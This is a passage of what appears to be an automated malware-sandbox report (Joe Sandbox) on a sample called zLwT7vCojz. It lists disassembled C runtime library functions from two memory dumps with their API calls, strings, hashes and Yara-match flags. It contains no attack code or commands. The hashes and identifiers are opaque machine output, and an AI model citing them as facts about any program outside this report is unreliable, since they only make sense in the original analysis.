___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040C9D1
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040C9EA
SetLastError.KERNEL32(00000000,?,0040C9AC,0040A25B), ref: 0040CA3C

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 9ec8e2a5af9cecc2b331547669bdca73f67e442984506367ed98352285f45261
Instruction ID: 4d2dab335d40ef71c1f126db0958835d547db160ba3e5df8986dc94b5f1501a5
Opcode Fuzzy Hash: 9ec8e2a5af9cecc2b331547669bdca73f67e442984506367ed98352285f45261
Instruction Fuzzy Hash: 5001C072609619AEE63857B5BCC5B2B3665DB01378720033FF220B02F1EF694C06558C

Uniqueness

Uniqueness Score: -1.00%

Function 04336F80 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0432E697,?,?,?,0432ED94,?), ref: 04336F84
_free.LIBCMT ref: 04336FB7
_free.LIBCMT ref: 04336FDF
SetLastError.KERNEL32(00000000), ref: 04336FEC
SetLastError.KERNEL32(00000000), ref: 04336FF8
_abort.LIBCMT ref: 04336FFE

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
Instruction ID: 5e45d77dad2263f1a8880f22311913f30f667b2b9e9461078ca51571e0da64ae
Opcode Fuzzy Hash: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
Instruction Fuzzy Hash: 9BF0F471648A003EE23233757C0EF2F25199FC1727F256238F524E62D0EF20F8024568

Uniqueness

Uniqueness Score: -1.00%

Function 00416D19 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
_free.LIBCMT ref: 00416D50
_free.LIBCMT ref: 00416D78
SetLastError.KERNEL32(00000000), ref: 00416D85
SetLastError.KERNEL32(00000000), ref: 00416D91
_abort.LIBCMT ref: 00416D97

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
Instruction ID: ed1cfbe94671cc1e241a5e305b234748cf7dab698c9013e935629a888f8688e1
Opcode Fuzzy Hash: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
Instruction Fuzzy Hash: 1CF0A431784B1066C6227B36BC0AFDF26299FC1765B27062FF518A2291EF2CD882815D

Uniqueness

Uniqueness Score: -1.00%

Function 00417253 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,-@,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue), ref: 00417285
GetLastError.KERNEL32(?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042E2F0,FlsSetValue,00000000,00000364,?,00416DEB), ref: 00417291
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042E2F0,FlsSetValue,00000000), ref: 0041729F

Strings

-@, xrefs: 0041727C

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: -@
API String ID: 3177248105-2564449678
Opcode ID: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
Instruction ID: 8997a9a2b537593604dca6541f5acb5d3abab1905c8fb23eed40c845f27096e8
Opcode Fuzzy Hash: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
Instruction Fuzzy Hash: ED01473634A2239BC7314B68AC44A9B3BA8BF117607114675F90AE3240DB34D843C6EC

Uniqueness

Uniqueness Score: -1.00%

Function 04321AE6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 04321B30
std::system_error::system_error.LIBCPMT ref: 04321B3F

Strings

ios_base::badbit set, xrefs: 04321AF7, 04321B18
ios_base::eofbit set, xrefs: 04321B07
ios_base::failbit set, xrefs: 04321B02, 04321B39

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::system_error::system_error
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1589814233-1866435925
Opcode ID: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
Instruction ID: 21ec141acd897872a1c2046023156073dce0692ff2dc72ec57cb6b54e0047524
Opcode Fuzzy Hash: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
Instruction Fuzzy Hash: A9F0F67190437C73DF14BA909F40FE97AAC9F08394F14A025ED4467180E7B57A0482E8

Uniqueness

Uniqueness Score: -1.00%

Function 0040187F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
std::system_error::system_error.LIBCPMT ref: 004018D8

Strings

ios_base::badbit set, xrefs: 00401890, 004018B1
ios_base::eofbit set, xrefs: 004018A0
ios_base::failbit set, xrefs: 0040189B, 004018D2

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: Exception@8Throwstd::system_error::system_error
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1589814233-1866435925
Opcode ID: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
Instruction ID: 07e54f61a89a03d5a6d9a7cf2ef478e5e050e13e4079476904521aa99984b06a
Opcode Fuzzy Hash: f2b461feaf179d542cbf2c4e0a6ea1a5b768cccac94e3b71525c17bbe98a983a
Instruction Fuzzy Hash: 78F0C26290035C63DB10B9659C42FEA7B989F09358F24C03BFD45761E1D77D5A04C6ED

Uniqueness

Uniqueness Score: -1.00%

Function 00413A6C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002), ref: 00413A8C
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00413A9F
FreeLibrary.KERNEL32(00000000,?,?,?,00413A1D,00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000), ref: 00413AC2

Strings

CorExitProcess, xrefs: 00413A97
mscoree.dll, xrefs: 00413A85

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: aee02ad5ca534fb28cb66d43b3f01b7085f8b2a17258c2e684143968d834cc31
Instruction ID: a34188c843a8f46fdd92a2bf3fbb0ddbd7449eedd0cf1b17e067f3e400b11719
Opcode Fuzzy Hash: aee02ad5ca534fb28cb66d43b3f01b7085f8b2a17258c2e684143968d834cc31
Instruction Fuzzy Hash: 2CF0A930B01218BBDB109F50DC05B9E7F78EF44752F404069F809A2290DF344E45C79C

Uniqueness

Uniqueness Score: -1.00%

Function 0433ACE0 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
Instruction ID: 09c64ece9e7e754056908cbdde54ca677f7b4e69a64c618a48c4fffa52d2f0c7
Opcode Fuzzy Hash: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
Instruction Fuzzy Hash: 9A71C075A012169FDF21EF54CC84ABFBBB9EF41316F146229F89167290DB70B941CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041AA79 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
Instruction ID: 9cd28828fb54a95b18f1d3d04b552151bab261da8883c7926ca586bf812e9daa
Opcode Fuzzy Hash: 9991de58590992e92c6734fa5e686e80b55cc645183ccc2c8a9f166d6c2c0499
Instruction Fuzzy Hash: AA71B1359022569BCB218B59C884AFFBB75EF41350F14422BE914A7380E7789CE1C7EA

Uniqueness

Uniqueness Score: -1.00%

Function 04334833 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 04337CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04337CDE

_free.LIBCMT ref: 0433493E
_free.LIBCMT ref: 04334955
_free.LIBCMT ref: 04334974
_free.LIBCMT ref: 0433498F
_free.LIBCMT ref: 043349A6

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 8544e75f2518b62a1a383347014769151c2d842ae9fb572832dcd9a460fabfde
Instruction ID: 55bf17d4dcb194249b5fecb1e34a5dd3d40739df3368d47199f68f92a951084d
Opcode Fuzzy Hash: 8544e75f2518b62a1a383347014769151c2d842ae9fb572832dcd9a460fabfde
Instruction Fuzzy Hash: A351D372A00704AFEB20DF69DC81B6A77F4EF6972AF141569E849DB250E735FA01CB40

Uniqueness

Uniqueness Score: -1.00%

Function 004145CC Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77

_free.LIBCMT ref: 004146D7
_free.LIBCMT ref: 004146EE
_free.LIBCMT ref: 0041470D
_free.LIBCMT ref: 00414728
_free.LIBCMT ref: 0041473F

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 088220e492716788e8e6bec049d5caff652ce20ed0a84fe148ba2189e9e303d7
Instruction ID: c2206efc5f66e5100cf0e8c7e25606760de7fe79bb98949094d9bf3f90d27d39
Opcode Fuzzy Hash: 088220e492716788e8e6bec049d5caff652ce20ed0a84fe148ba2189e9e303d7
Instruction Fuzzy Hash: 6B51D471A00304AFDB20DF65D881BAA77F4EF99728F15056EE809D7690E739E981CB48

Uniqueness

Uniqueness Score: -1.00%

Function 043352CA Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0433533C
_free.LIBCMT ref: 0433535C

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
Instruction ID: 0251fcc9be1f808cace2e73f6de765c4c9d399abfd60cd16568eb1f1af95a12f
Opcode Fuzzy Hash: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
Instruction Fuzzy Hash: F741D172A00310AFDB24DF78C880B5EB7B5EF89325F555569D615EB290EB71FA01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00415063 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004150D5
_free.LIBCMT ref: 004150F5

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
Instruction ID: dd2835c9885c6aa3f8cce8b3b5d5cac91b3775441f4e2c90be38872ca8706c4a
Opcode Fuzzy Hash: 1450a82dd80fdefbfcbec48a944690f0dac7dfc0c2c461d496b8d8880cae35ad
Instruction Fuzzy Hash: A341D332E00710EFDB15DFA9C880A9AB7B1EF89314B1545AAE515EB382D735AD41CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0041B429 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00411992,?,00000000,?,00000001,?,?,00000001,00411992,?), ref: 0041B476
__alloca_probe_16.LIBCMT ref: 0041B4AE
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0041B4FF
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00410DE7,?), ref: 0041B511
__freea.LIBCMT ref: 0041B51A

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 2ab1cb42388bea207d069ccf979aa5779a8c9a7d5d58f401a09ee4fbb91ad362
Instruction ID: e6e93543b041c594e81487d5909f541e573430f1ea5015fd54542e6688d1641d
Opcode Fuzzy Hash: 2ab1cb42388bea207d069ccf979aa5779a8c9a7d5d58f401a09ee4fbb91ad362
Instruction Fuzzy Hash: E931AC32A0021AABDB249F65DC41DEF7BA5EF40318F04412AFC04D6291EB39CD95CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0433E79A Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0433E7A3
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0433E7C6

Part of subcall function 04337CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04337CDE

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0433E7EC
_free.LIBCMT ref: 0433E7FF
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0433E80E

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 38dd7213b9bcb45c1147e39a21c5c15d2d7fc2ddc2b943de6988b854aed99f6c
Instruction ID: 260c750483194d32ed42b11d56311e5f0bbf552fc0e8574b9664004ce43c934a
Opcode Fuzzy Hash: 38dd7213b9bcb45c1147e39a21c5c15d2d7fc2ddc2b943de6988b854aed99f6c
Instruction Fuzzy Hash: 39018F72B027257F233126BA5C8DC7F6E6DDFC2EA6315123DF914D6200EE65AD0281B5

Uniqueness

Uniqueness Score: -1.00%

Function 0041E533 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0041E53C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E55F

Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0041E585
_free.LIBCMT ref: 0041E598
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041E5A7

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: fd9cb40695fd0089d65125f9c917d3271f033025ad03b813fa21ea85d7d026fb
Instruction ID: da1d7805988d3e4f29d48d7d5147bf5fd0936ba562dc79f78d94e6ba61cfb34a
Opcode Fuzzy Hash: fd9cb40695fd0089d65125f9c917d3271f033025ad03b813fa21ea85d7d026fb
Instruction Fuzzy Hash: 4901D8766027207F23211AB75C48DFF6E6EDEC6B98355012EFD08D6200FE688D429178

Uniqueness

Uniqueness Score: -1.00%

Function 04337004 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,043325ED,04337307,?,04336FAE,00000001,00000364,?,0432E697,?,?,?,0432ED94,?), ref: 04337009
_free.LIBCMT ref: 0433703E
_free.LIBCMT ref: 04337065
SetLastError.KERNEL32(00000000), ref: 04337072
SetLastError.KERNEL32(00000000), ref: 0433707B

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
Instruction ID: cd02e69d83a86ed929f5ce64792f6739b1c6777cd979d4a4f71760112ac62a57
Opcode Fuzzy Hash: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
Instruction Fuzzy Hash: D501F9F6640A003BA73227F56C84F5F265DEFC1277721B238F515A2280FF25A8024564

Uniqueness

Uniqueness Score: -1.00%

Function 00416D9D Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00412386,004170A0,?,00416D47,00000001,00000364,?,0040E430,?,?,?,0040EB2D,?), ref: 00416DA2
_free.LIBCMT ref: 00416DD7
_free.LIBCMT ref: 00416DFE
SetLastError.KERNEL32(00000000), ref: 00416E0B
SetLastError.KERNEL32(00000000), ref: 00416E14

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
Instruction ID: e46c26cc5ac3d344e97fba90109cbcfbfaa945fe7b6790f8bafc9466d81cae3c
Opcode Fuzzy Hash: c553f296653e70e9d560cfb8a25ebfd7f1785a3d038cabbef75213465da2ef3c
Instruction Fuzzy Hash: CA01D6367447106A82217676BC85EEB2629DBC5764763027FF515A2282EF2CCC86515C

Uniqueness

Uniqueness Score: -1.00%

Function 0433F105 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0433F11D

Part of subcall function 04336501: HeapFree.KERNEL32(00000000,00000000,?,0433F3B8,?,00000000,?,00000000,?,0433F65C,?,00000007,?,?,0433FA50,?), ref: 04336517
Part of subcall function 04336501: GetLastError.KERNEL32(?,?,0433F3B8,?,00000000,?,00000000,?,0433F65C,?,00000007,?,?,0433FA50,?,?), ref: 04336529

_free.LIBCMT ref: 0433F12F
_free.LIBCMT ref: 0433F141
_free.LIBCMT ref: 0433F153
_free.LIBCMT ref: 0433F165

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
Instruction ID: a0d3cda316aea8aa4a5b6d5fd28f0e12de95077906e9d2ee57cd9631d2662d1f
Opcode Fuzzy Hash: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
Instruction Fuzzy Hash: 21F09632C00A00BFEA30DBA8F8C6D1777D9EE047527943825F554D7600CB35FC814A94

Uniqueness

Uniqueness Score: -1.00%

Function 0041EE9E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041EEB6

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041EEC8
_free.LIBCMT ref: 0041EEDA
_free.LIBCMT ref: 0041EEEC
_free.LIBCMT ref: 0041EEFE

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
Instruction ID: 4b083a6e31e8a48a8b86c3cb0939e7a8061e9024a6891407e723d3d4127bfca1
Opcode Fuzzy Hash: d4ccbc2f617275c87f26a6c66d33927148d843e0dce03c06d1c0141f6de17669
Instruction Fuzzy Hash: 09F04F32504310AB8A20EB6AF886E9773D9FA44764355480AFD08D7600CB38FCC0869C

Uniqueness

Uniqueness Score: -1.00%

Function 04335519 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 04335537

Part of subcall function 04336501: HeapFree.KERNEL32(00000000,00000000,?,0433F3B8,?,00000000,?,00000000,?,0433F65C,?,00000007,?,?,0433FA50,?), ref: 04336517
Part of subcall function 04336501: GetLastError.KERNEL32(?,?,0433F3B8,?,00000000,?,00000000,?,0433F65C,?,00000007,?,?,0433FA50,?,?), ref: 04336529

_free.LIBCMT ref: 04335549
_free.LIBCMT ref: 0433555C
_free.LIBCMT ref: 0433556D
_free.LIBCMT ref: 0433557E

Memory Dump Source

Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
Instruction ID: c68db39bdec9f82db64391ca3a6824df879c0d90ab4545389c6ed376364afa9d
Opcode Fuzzy Hash: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
Instruction Fuzzy Hash: 3FF03AB1811620AFEA266F59FCC15053F61EB14626351717AF508A2278CF3A6A818FCA

Uniqueness

Uniqueness Score: -1.00%

Function 004152B2 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004152D0

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2

_free.LIBCMT ref: 004152E2
_free.LIBCMT ref: 004152F5
_free.LIBCMT ref: 00415306
_free.LIBCMT ref: 00415317

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
Instruction ID: 0846cff003075c5ec292790c94e0e8fa2dbc871af0b69e12aa43d6fe7fad35b7
Opcode Fuzzy Hash: 355dd383c1edd0226fbc2c643ef7780839a72101d59efc5f040e21f59429e8dd
Instruction Fuzzy Hash: D9F0DAB18017209BCA167F19FC816893B60FB5872872271BBF919A6275CB3959818FCD

Uniqueness

Uniqueness Score: -1.00%

Function 0041608E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Strings

@, xrefs: 0041618D

Memory Dump Source

Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

